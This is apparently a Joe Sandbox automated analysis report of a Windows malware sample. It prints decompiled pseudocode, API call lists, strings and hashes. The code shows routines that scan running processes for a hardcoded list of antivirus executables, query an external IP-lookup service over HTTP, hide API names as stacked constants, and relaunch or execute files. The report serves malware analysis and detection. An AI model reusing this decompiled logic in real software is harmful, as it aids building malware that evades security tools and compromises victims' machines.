											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0f148058
0x0f14805b
0x0f148060
0x0f148063
0x0f148063
0x0f14806b
0x0f148082
0x0f148088
0x0f14808a
0x0f148091
0x0f148096
0x0f1480af
0x0f1480b8
0x0f1480c0
0x0f1480c3
0x0f1480e7
0x0f1480eb
0x0f1480f8
0x0f148101
0x0f148108
0x0f14810f
0x0f148116
0x0f14811d
0x0f148124
0x0f14812b
0x0f148132
0x0f148139
0x0f148140
0x0f148147
0x0f148156
0x0f14816d
0x0f1481bc
0x0f14816f
0x0f148175
0x0f148178
0x0f14817d
0x0f14818c
0x0f148190
0x0f148190
0x0f148195
0x00000000
0x00000000
0x0f148197
0x0f1481a2
0x0f1481a9
0x0f1481b8
0x00000000
0x00000000
0x0f1481ba
0x00000000
0x0f1481b8
0x0f148190
0x0f14818c
0x0f14816d
0x0f148156
0x0f1481c2
0x0f1481c9
0x0f1481ce
0x0f1481da
0x0f1481e9
0x0f14809e
0x0f14809e
0x0f14809e

APIs

InternetCloseHandle.WININET(?), ref: 0F148063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F148082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F147046,ipv4bot.whatismyipaddress.com,0F14FF90), ref: 0F1480AF
wsprintfW.USER32 ref: 0F1480C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F1480E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F14814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F148165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F148184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F1481B0
GetLastError.KERNEL32 ref: 0F1481BC
InternetCloseHandle.WININET(00000000), ref: 0F1481C9
InternetCloseHandle.WININET(00000000), ref: 0F1481CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F147046), ref: 0F1481DA

Strings

p, xrefs: 0F14810F
s, xrefs: 0F148101
H, xrefs: 0F1480F8
a, xrefs: 0F148139
a, xrefs: 0F148132
HTTP/1.1, xrefs: 0F1480D7
b, xrefs: 0F148140
:, xrefs: 0F148108
t, xrefs: 0F148147
l, xrefs: 0F148116
t, xrefs: 0F14811D
a, xrefs: 0F148124
o, xrefs: 0F14812B

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 913a886aba911e3e80ab5987e55e8dd7294e69b378090a359f2dcd99e882b6c9
Instruction ID: 43064b82fd15e8e79b00abda3444bef49ccb0c31e247dffcc2c0855050c872cf
Opcode Fuzzy Hash: 913a886aba911e3e80ab5987e55e8dd7294e69b378090a359f2dcd99e882b6c9
Instruction Fuzzy Hash: C2419534640208BFEB108F51DC48F9E7FB9FF84B65F104119FA04A6281C7B5A9A4CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F144B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F1447D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F142D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F1448C0(); // executed
					E0F1442B0(_t90, _t106); // executed
					E0F146550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F146500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F144B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F145860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F1464C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F144200();
							InitializeCriticalSection(0xf152a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F143FF0( &_v80);
							} else {
								E0F1441D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf152a48);
							__eflags = E0F143C70();
							if(__eflags != 0) {
								E0F1445B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F143DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf152a44;
							if( *0xf152a44 != 0) {
								_t97 =  *0xf152a44; // 0x2280000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F143DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0f144b2b
0x0f144b31
0x0f144b38
0x0f144b51
0x0f144b57
0x0f144b5e
0x0f144b74
0x0f144b78
0x0f144b7c
0x0f144b7c
0x0f144b82
0x0f144b86
0x0f144b86
0x0f144b8c
0x0f144b91
0x0f144b99
0x0f144b9e
0x0f144ba5
0x0f144bac
0x0f144bb3
0x0f144bcd
0x0f144bd2
0x0f144bd9
0x0f144bea
0x0f144c3b
0x0f144c53
0x0f144c58
0x0f144c5d
0x0f144c6c
0x0f144c5f
0x0f144c64
0x0f144c64
0x0f144c73
0x0f144c78
0x0f144c7d
0x0f144c84
0x0f144c8b
0x0f144c92
0x0f144c99
0x0f144c9d
0x0f144cef
0x0f144cef
0x0f144cf9
0x0f144cff
0x0f144d03
0x0f144d15
0x0f144d05
0x0f144d0b
0x0f144d0b
0x0f144d1f
0x0f144d2a
0x0f144d2c
0x0f144d2e
0x0f144d2e
0x0f144d47
0x0f144d4a
0x0f144d4e
0x0f144d5b
0x0f144d64
0x0f144d74
0x0f144d74
0x0f144d7a
0x0f144d81
0x0f144d89
0x0f144d97
0x0f144d97
0x0f144d9f
0x0f144d9f
0x0f144ca9
0x0f144cbf
0x0f144cd6
0x0f144cdc
0x0f144cde
0x0f144ce8
0x00000000
0x0f144ce8
0x0f144ce2
0x0f144bec
0x0f144c00
0x0f144c03
0x0f144c07
0x0f144c14
0x0f144c1d
0x0f144c2d
0x0f144c2d
0x0f144c35
0x0f144c35
0x0f144bea
0x0f144b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0F144B2B

Part of subcall function 0F1447D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14482C
Part of subcall function 0F1447D0: lstrcpyW.KERNEL32 ref: 0F14484F
Part of subcall function 0F1447D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144856
Part of subcall function 0F1447D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14486E
Part of subcall function 0F1447D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14487A
Part of subcall function 0F1447D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144881
Part of subcall function 0F1447D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14489B

ExitProcess.KERNEL32 ref: 0F144B3C
CreateThread.KERNEL32 ref: 0F144B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F144B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0F144B7C
CloseHandle.KERNEL32(00000000), ref: 0F144B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F144BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F144C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F144C2D
ExitProcess.KERNEL32 ref: 0F144C35

Strings

open, xrefs: 0F144D90

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 1f21e5273a1d8b736f8f0b04515439e22457436af04e2ee5ec4331c2670c3d7e
Instruction ID: dda7cda757b37dfd57fccc007f87df731be2a8b9ae86ebb230b08c76a69bd172
Opcode Fuzzy Hash: 1f21e5273a1d8b736f8f0b04515439e22457436af04e2ee5ec4331c2670c3d7e
Instruction Fuzzy Hash: 37711D74A80309ABEB14DFE0DC59FEE7774AF84B16F104014E605AA1C1DBB879A8CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F147B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F147B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0f147b8d
0x0f147b8f
0x0f147b9d
0x0f147b9f
0x0f147ba6
0x0f147bad
0x0f147bb4
0x0f147bbb
0x0f147bc2
0x0f147bc9
0x0f147bd0
0x0f147bd7
0x0f147bde
0x0f147be5
0x0f147bec
0x0f147bf3
0x0f147bfa
0x0f147c01
0x0f147c03
0x0f147c05
0x0f147c0a
0x0f147c34
0x0f147c3a
0x0f147c0c
0x0f147c10
0x0f147c16
0x0f147c1c
0x0f147c22
0x0f147c3f
0x0f147c41
0x0f147c43
0x0f147c46
0x0f147c49
0x0f147c4c
0x0f147c4f
0x0f147c57
0x00000000
0x0f147c60
0x0f147c68
0x0f147c70
0x0f147c7f
0x0f147c83
0x00000000
0x0f147c85
0x0f147c85
0x0f147c85
0x0f147ce7
0x0f147ce7
0x0f147cee
0x0f147cf6
0x00000000
0x00000000
0x00000000
0x0f147cf6
0x0f147c8e
0x0f147c8f
0x0f147c91
0x0f147c98
0x0f147cb5
0x0f147cbe
0x0f147c9a
0x0f147c9a
0x0f147ca7
0x0f147ca7
0x0f147cc0
0x0f147cde
0x0f147ce1
0x0f147ce4
0x00000000
0x0f147ce4
0x0f147d07
0x0f147d0b
0x0f147d0d
0x0f147d13
0x0f147d20
0x0f147d20
0x0f147d13
0x0f147d2b
0x0f147d2b
0x0f147d3b
0x0f147d40
0x0f147d46
0x0f147d4b
0x0f147d55
0x0f147d55
0x0f147d5f
0x0f147c24
0x0f147c2c
0x00000000
0x0f147c2c
0x0f147c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F147B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F147C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F147C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F147C4F
lstrcmpiW.KERNEL32(0F1503AC,-00000024), ref: 0F147C75
Process32NextW.KERNEL32(?,?), ref: 0F147CEE
GetLastError.KERNEL32 ref: 0F147CF8
lstrlenW.KERNEL32(00000000), ref: 0F147D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F147D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0F147D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F147D55

Strings

i)w, xrefs: 0F147C75

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 1411803383-1280834553
Opcode ID: 19012602e29d3b7790e4a27250864a9ef68cef1c94b66388f93a56b3929e6adb
Instruction ID: 97e325acea79677ac55da82c9b994057d18117d0c76afafee74e3b1395c558a7
Opcode Fuzzy Hash: 19012602e29d3b7790e4a27250864a9ef68cef1c94b66388f93a56b3929e6adb
Instruction Fuzzy Hash: 6851BE71E40219EFCB20CF94D948BAEBBB4FF88B25F214059E910BB281C7746965CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1482B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0F1482B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0f1482c0
0x0f1482c2
0x0f1482c7
0x0f1482ca
0x0f1482cd
0x0f1482d5
0x0f1483c9
0x0f1483d1
0x0f1482db
0x0f1482db
0x0f1482e0
0x0f1482e0
0x0f1482e3
0x0f1482e8
0x0f1482e9
0x0f1482f5
0x0f1482f5
0x0f1482fb
0x0f148301
0x0f148305
0x0f1483d7
0x0f1483e5
0x0f1483f3
0x0f148313
0x0f148316
0x0f14831e
0x0f148325
0x0f14832c
0x0f148332
0x0f148336
0x0f14833d
0x0f148344
0x0f14834b
0x0f14834f
0x0f148357
0x0f148367
0x0f148367
0x0f14836c
0x0f148374
0x00000000
0x0f148376
0x0f148376
0x0f148377
0x0f148378
0x0f14837f
0x00000000
0x0f148381
0x0f148381
0x0f148385
0x0f148387
0x0f14838a
0x0f148391
0x0f148395
0x0f14839e
0x0f1483a2
0x0f1483a3
0x0f148391
0x0f1483a7
0x0f1483a7
0x0f14837f
0x0f148359
0x0f148359
0x0f14835d
0x0f148365
0x0f1483ae
0x0f1483ae
0x00000000
0x00000000
0x00000000
0x0f148365
0x0f1483b5
0x0f1483c3
0x00000000
0x0f1483c3
0x0f148305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
GetModuleHandleA.KERNEL32(?), ref: 0F14834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1483E5

Strings

Advapi32.dll, xrefs: 0F148359, 0F14835C
CryptGenRandomAdvapi32.dll, xrefs: 0F148367, 0F14836A

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 68a0b4c260ffe8112be6ec6c0bb84235ce743d8660b6c49ab48a55fdb86692f8
Instruction ID: 24720a91cf389dc5134221f566be7856e50987b67b8a77abf5a85cc074c744cc
Opcode Fuzzy Hash: 68a0b4c260ffe8112be6ec6c0bb84235ce743d8660b6c49ab48a55fdb86692f8
Instruction Fuzzy Hash: 48312874A40209ABDB208FE5DC45BEEBB78FF84721F144029E501A6281E775FA25CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0F148400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0F148400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x0f148410
0x0f148412
0x0f148417
0x0f14841d
0x0f148420
0x0f148428
0x0f1484f2
0x0f1484fa
0x0f14842e
0x0f14842e
0x0f148430
0x0f148430
0x0f148433
0x0f148437
0x0f148438
0x0f148444
0x0f148448
0x0f14844e
0x0f148452
0x0f148500
0x0f14850e
0x0f14851c
0x0f148461
0x0f148464
0x0f14846c
0x0f148473
0x0f14847a
0x0f148480
0x0f148484
0x0f14848b
0x0f148492
0x0f148499
0x0f14849d
0x0f1484a5
0x0f1484b5
0x0f1484b5
0x0f1484ba
0x0f1484c2
0x0f1484cd
0x0f1484d6
0x0f1484d6
0x0f1484a7
0x0f1484a7
0x0f1484ab
0x0f1484b3
0x00000000
0x00000000
0x0f1484b3
0x0f1484de
0x0f1484ec
0x00000000
0x0f1484ec
0x0f148452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F148420
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F148448
GetModuleHandleA.KERNEL32(?), ref: 0F14849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1484AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1484BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1484DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1484EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F148500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F14850E

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F1484B5, 0F1484B8
Advapi32.dll, xrefs: 0F1484A7, 0F1484AA

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 1ccb4957c961c58e3e50a4b8d35658860d0ebd67b2c6c0391e52695f8370b892
Instruction ID: 361492867c70e9f71b42b36f01fc84e96629479dba1268a3b555dce683df4810
Opcode Fuzzy Hash: 1ccb4957c961c58e3e50a4b8d35658860d0ebd67b2c6c0391e52695f8370b892
